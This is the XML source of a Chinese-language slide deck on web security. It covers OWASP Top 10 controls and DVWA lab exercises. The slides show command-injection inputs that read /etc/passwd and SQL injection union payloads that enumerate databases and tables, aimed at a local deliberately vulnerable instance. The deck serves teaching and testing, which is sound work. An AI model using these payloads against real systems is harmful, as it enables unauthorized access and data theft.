              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t> 定期維護該清單並確保正確性</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>使用外部元件或軟體，注意其安全通告並且評估更新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CVE (Common Vulnerabilities and Exposures)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>國際著名的漏洞安全資料庫</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>其內容包含對已知安全漏 洞的標準化名稱列表</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>讓使用者能夠更有效率的識別、 發現和修復元件的漏洞問題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DA75CB-04EB-4170-8727-589B84BA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78" y="3951514"/>
            <a:ext cx="4588022" cy="16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6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630B0-5255-406A-ABEF-AA221484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000">
                <a:latin typeface="Franklin Gothic Medium"/>
                <a:ea typeface="新細明體"/>
                <a:cs typeface="Calibri Light"/>
              </a:rPr>
              <a:t>Agenda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8E66B-CA8E-4A63-B634-0A04814BE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3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dirty="0">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>網站的資安威脅</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" dirty="0">
              <a:cs typeface="Calibri" panose="020F0502020204030204"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" dirty="0">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>從OWASP TOP 10 到OWASP API TOP 10</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-TW" altLang="en-US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zh-TW" dirty="0">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>DVWA 測試平台</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" dirty="0">
              <a:ea typeface="新細明體"/>
              <a:cs typeface="Calibri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zh-TW" dirty="0">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>DVWA實戰:command injection</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW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zh-TW" dirty="0">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>DVWA實戰:SQLI</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW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zh-TW" dirty="0">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>DVWA實戰:File Inclusion vuln.</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW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zh-TW" dirty="0">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>DVWA實戰:XSS</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW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zh-TW" dirty="0">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>學習心得</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW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zh-TW" altLang="en-US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6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837"/>
            <a:ext cx="12192000" cy="1094013"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="33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A10 Insufficient Logging &amp; Monitoring </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-TW" sz="33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300" b="1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紀錄與監控不足風險</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" sz="33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7850"/>
            <a:ext cx="12192000" cy="5540150"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>未記錄到駭客的攻擊行為導致無法被偵測或是追蹤攻擊資訊</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" b="1" dirty="0"/>
              <a:t>建議控制措施</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty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確保登錄、存取失敗、驗證失敗的訊息都能被完整記錄，並保留足夠的用戶資訊，以辨別可疑或惡意行為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確保高額交易能有完整的審計訊息（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Noto Sans TC"/>
              </a:rPr>
              <a:t>audit trail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），以防被竄改或刪除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建立有效的監控與警告機制，使可疑活動在短時間內能夠被發現及應對</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>身分驗證機制 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>(Authentication):</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>驗證成功及失敗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帳戶鎖定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密碼變更</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>資料存取</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>(Data Access):</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>敏感資料被讀取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資料異動及刪除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資料結構變更 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管理者行為</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>功能錯誤</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>(All Error Conditions):</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>查詢語法執行失敗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檔案存取錯誤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非預期的狀態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、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>連線失敗</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>資料庫或其他 外部系統等</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>)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Noto Sans TC"/>
              </a:rPr>
              <a:t> 、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>逾時、效能問題</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="82863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26671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DVWA</a:t>
            </a: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實戰環境</a:t>
            </a:r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 Docker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7057"/>
            <a:ext cx="12192000" cy="5910943"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>檢視現有 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>dockr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>image:docker</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> image ls</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>執行</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>DVWA:docker</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> run -it -p 8080:80 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>vulnerables</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>/web-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>dvwa</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>瀏覽器</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>:http://127.0.0.1:8080/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>login.php</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>預設帳密為 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>admin / password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B676E0-B206-4FCB-BE97-3BFD20FA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6" y="3037283"/>
            <a:ext cx="5833214" cy="38207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D14723D-98E8-4FAD-A3D1-55A8D7DC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79" y="3037282"/>
            <a:ext cx="5702441" cy="38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8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b="1" dirty="0"/>
              <a:t>DVWA Security </a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" sz="60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D439F7-2FED-470C-BE5F-8B272085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1" y="1825625"/>
            <a:ext cx="5295880" cy="44494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C4FC2F-51ED-475F-8CFC-8286694C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05" y="1796503"/>
            <a:ext cx="5856195" cy="44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5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E9361C-1A9E-467E-8AD0-A809225B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72" y="285707"/>
            <a:ext cx="7852455" cy="6492874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1DC16C3-C449-48F6-B3CB-C032584AAB05}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4023652" y="4223657"/>
            <a:ext cx="1107995" cy="13672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9CA29C-2391-46C5-8B7F-52700BE715A4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5751488" y="4741816"/>
            <a:ext cx="116389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安全等級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FD57114-9E4C-46DA-8776-B7FB0E690F9A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5707715" y="4719650"/>
            <a:ext cx="1163890" cy="444137"/>
          </a:xfrm>
          <a:prstGeom prst="round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FD3529C-0DAC-4EF0-B0FB-D6BBB431DD26}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="5179070" y="4754876"/>
            <a:ext cx="444804" cy="373687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CCCCFF"/>
                </a:solidFill>
              </a:ln>
              <a:solidFill>
                <a:srgbClr val="CCCCFF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C01235D-B4E6-460D-92D3-ADD6B6DF5187}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4023652" y="1062446"/>
            <a:ext cx="2133308" cy="539931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chemeClr val="accent5">
                    <a:lumMod val="75000"/>
                  </a:schemeClr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8689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D67C18D-5A40-4D90-9B9C-734659108D62}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="691243" y="2459504"/>
            <a:ext cx="10809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A1—Injection</a:t>
            </a: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之</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW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Command injection</a:t>
            </a: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漏洞實務測試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6182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1106878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DEMO::DVWA_1.10_low</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" sz="4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40970"/>
            <a:ext cx="12191999" cy="5617029"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2800" dirty="0"/>
              <a:t>正常輸入</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2800" dirty="0"/>
              <a:t>:168.95.1.1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1A530E-8D84-43F4-94DA-8048AA88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1" y="1948928"/>
            <a:ext cx="8564170" cy="4201111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8E4B59-58DB-4C5C-A06C-669D6B955BBE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="252699" y="4049483"/>
            <a:ext cx="1860016" cy="473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2FC7E1-029A-4744-A571-86F822369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566" y="2895854"/>
            <a:ext cx="7375132" cy="2780787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5254237F-F1A7-4F91-B9A1-57D27936077D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6939643" y="3020786"/>
            <a:ext cx="1600200" cy="40821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EF97C9-61E8-4B35-B15E-A97FA9ABB98A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7151280" y="30596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168.95.1.1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63425A8-4882-4602-AEEA-7438D806592E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5274129" y="3886200"/>
            <a:ext cx="5633357" cy="16165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6899E0A5-7061-4DC6-9AC0-D421B4952D4C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="8055211" y="5578478"/>
            <a:ext cx="484632" cy="5388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13E5BC-3778-4E62-B11E-5C5217F4AE16}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7101737" y="6262242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ping -c4 IP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20EE457-5A12-4A74-88B9-E521EAE20868}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6994686" y="6177896"/>
            <a:ext cx="2605682" cy="680104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12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54"/>
            <a:ext cx="12192000" cy="684484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4000" b="1" dirty="0"/>
              <a:t>DEMO::DVWA_1.10_low </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2800" dirty="0"/>
              <a:t>不正常輸入</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2800" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>168.95.1.1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TW" dirty="0"/>
              <a:t> ifconfig</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>168.95.1.1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TW" dirty="0"/>
              <a:t> cat /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>/passwd</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US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593D96-6368-4CC5-9DE8-DCDD28A0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37" y="1042298"/>
            <a:ext cx="5858991" cy="36311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63E251-F60B-45B5-9318-C3984D76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2193228"/>
            <a:ext cx="5398253" cy="4378583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C3B4B8-9ED7-4DFC-B03E-285CF5614B7C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1273629" y="4800600"/>
            <a:ext cx="4425042" cy="3918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BA240A-5070-4B2A-89E0-D5C0ECA4CC66}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6096000" y="4800600"/>
            <a:ext cx="23102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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW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ping –c4  IP</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW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88952E-F2E3-420B-96AF-28F878A8E9E0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3641272" y="5592005"/>
            <a:ext cx="585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ping –c4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168.95.1.1 | cat /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/passwd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20D5066E-9EC2-44C0-A64E-1166FECD8C8D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5002335" y="5305816"/>
            <a:ext cx="473878" cy="391886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>
                <a:solidFill>
                  <a:schemeClr val="accent5">
                    <a:lumMod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6815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286"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0"/>
              <a:t>DEMO::DVWA_1.10_Medium</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" b="1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411"/>
            <a:ext cx="10515600" cy="4351338"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>不正常輸入</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>168.95.1.1 &amp; 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2EA739-2231-4A76-B62E-E368957E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40" y="2080362"/>
            <a:ext cx="7605488" cy="441251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0AD1B0C-068B-4F87-81CA-E764AE439B02}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5110843" y="5241471"/>
            <a:ext cx="2334986" cy="12514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2CEAAA-DEAF-4B84-9D50-4041390AE13B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7805057" y="54405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過濾字串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05BF34F-FDB7-4202-8E6A-DCD19AEA4C49}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7805057" y="5440589"/>
            <a:ext cx="1415772" cy="461665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396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87316-0278-4572-B6D0-2BFB97EE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8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/>
              <a:t>DEMO::DVWA_1.10_HIGH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67A14C-3F08-4B97-A7E5-5C939995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731"/>
            <a:ext cx="10515600" cy="4351338"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>不正常輸入168.95.1.1 |cat /etc/passwd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3FF1AA-7EAF-4257-86E3-445E9C0D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3" y="1932116"/>
            <a:ext cx="7661355" cy="47077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BA55F3-6C8E-415E-B64E-23C5B767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913" y="2247339"/>
            <a:ext cx="3516550" cy="34839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D36B3C9-40E8-4F78-8192-8DE0F08961C0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9157220" y="15157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過濾字元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9D6FB-AAEF-45EE-88E6-6776939C136A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8185913" y="2247339"/>
            <a:ext cx="3358387" cy="36477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D4DAA18-3335-48CD-9D59-7E78D8EEFE1D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9029700" y="1394769"/>
            <a:ext cx="1665514" cy="688830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50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1372DA7-E34E-456C-B06C-9CF9415CC923}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="95250" y="2459504"/>
            <a:ext cx="12001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/>
              <a:t>A1—Injection</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="6000" dirty="0"/>
              <a:t> 之</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="6000" dirty="0"/>
              <a:t>SQL injection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="6000" dirty="0"/>
              <a:t>漏洞實務測試</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="150802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389C8C-E9C4-499B-BA8E-DD17953A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181"/>
            <a:ext cx="10515600" cy="96145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網站的資安威脅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AA02C9-DB7D-4A13-861B-D4674AE81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801" y="943768"/>
            <a:ext cx="6248401" cy="4359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https://www.ithome.com.tw/news/137211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736E93-CB30-431F-B214-CE8BB20E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67" y="1365672"/>
            <a:ext cx="7410465" cy="54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61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0362B0-9E81-4F98-8E55-C00EC58C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69407"/>
            <a:ext cx="12311743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6000" b="1" dirty="0"/>
              <a:t>DVWA_1.10_low</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" sz="6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AACEE9-9528-4547-8207-40E84E57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948038"/>
            <a:ext cx="8573696" cy="362000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134F303-720B-4B34-B2C1-F7DB625746F8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1809152" y="5298621"/>
            <a:ext cx="1730829" cy="3755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8174DA-B456-427B-B6C9-A2D9BC274588}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="5780314"/>
            <a:ext cx="4355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判斷是否存在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0"/>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>注入的漏洞？</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>注入的是字元型還是數字型？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EBA15D9-0113-4ED4-8B39-7F4124CD1C89}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="718456" y="5780314"/>
            <a:ext cx="4355679" cy="914400"/>
          </a:xfrm>
          <a:prstGeom prst="round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283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0911-876D-451F-8495-E55795EB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857"/>
            <a:ext cx="12192000" cy="112349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嘗試輸入各種不正常的</a:t>
            </a:r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5075BD-EE7C-40AA-8D3D-1F4831B2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354"/>
            <a:ext cx="10515600" cy="4351338"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>正常輸入</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>:1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>2</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>不正常輸入</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>:1’</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>1’ and 1=1#</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>1‘ and 1=1 union select database()#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1‘ and 1=1 union select database(), user()#</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>1’ and 1=1 union select </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>table_name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>information_schema.tables</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>#</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>1‘ and 1=1 union select null, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>table_name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>information_schema.tables</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>#</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
